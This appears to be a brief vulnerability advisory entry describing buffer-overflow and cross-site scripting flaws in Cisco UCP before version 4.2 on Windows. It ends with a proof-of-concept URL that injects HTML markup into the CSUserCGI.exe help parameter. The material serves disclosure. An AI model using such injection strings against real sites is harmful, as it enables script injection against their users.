+The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205.
+
+These issues affect versions prior to UCP 4.2 when running on Microsoft Windows.
+
+http://www.example.com/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E
\ No newline at end of file